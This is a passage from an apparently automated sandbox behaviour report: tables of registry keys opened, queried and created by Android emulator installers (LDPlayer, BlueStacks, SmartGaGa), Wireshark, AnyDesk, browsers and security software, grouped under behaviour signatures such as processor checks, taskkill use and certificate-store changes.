| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\mmc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a1a8d825d9cc14480000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a1a8d8250000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a1a8d825000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da1a8d825000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a1a8d82500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp | N/A |
| Key opened | \Registry\Machine\Hardware\Description\System\CentralProcessor | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | F:\BlueStacks X\BlueStacks X.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | F:\BlueStacks X\BlueStacks X.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | F:\LDPlayer\LDPlayer9\dnplayer.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ | F:\BlueStacks X\BlueStacks X.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | F:\BlueStacks X\BlueStacks X.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | F:\LDPlayer\LDPlayer9\dnplayer.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Program Files\Wireshark\dumpcap.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ | C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp | N/A |
Enumerates processes with tasklist
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION | F:\LDPlayer\LDPlayer9\dnplayer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\ldnews.exe = "11001" | F:\LDPlayer\LDPlayer9\dnplayer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dnplayer.exe = "11001" | F:\LDPlayer\LDPlayer9\dnplayer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133641910590834886" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files\ReasonLabs\EPP\rsWSC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\McAfee\WebAdvisor\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-E5DB-4D2C-BAAA-C71053A6236D}\ = "IGuestOSType" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-1F04-4191-AA2F-1FAC9646AE4C}\ = "IProgressEvent" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-CB8D-4382-90BA-B7DA78A74573}\NumMethods | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-8690-11E9-B83D-5719E53CF1DE}\NumMethods\ = "52" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-7997-4595-A731-3A509DB604E5} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-F4F4-4DD0-9D30-C89B873247EC}\TypeLib\Version = "1.3" | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-6588-40A3-9B0A-68C05BA52C4B}\TypeLib\ = "{20191216-1750-46f0-936e-bd127d5bc264}" | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-CC7B-431B-98B2-951FDA8EAB89} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-9B2D-4377-BFE6-9702E881516B} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-B5BB-4316-A900-5EB28D3413DF}\NumMethods\ = "229" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-E4B1-486A-8F2E-747AE346C3E9} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-5FDC-4ABA-AFF5-6A39BBD7C38B} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-0FF7-46B7-A138-3C6E5AC946B4} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20191216-1807-4249-5BA5-EA42D66AF0BF}\InProcServer32 | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-FD1C-411A-95C5-E9BB1414E632}\NumMethods\ = "23" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-FA1E-4CEE-91C7-6D8496BEA3C1}\NumMethods | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
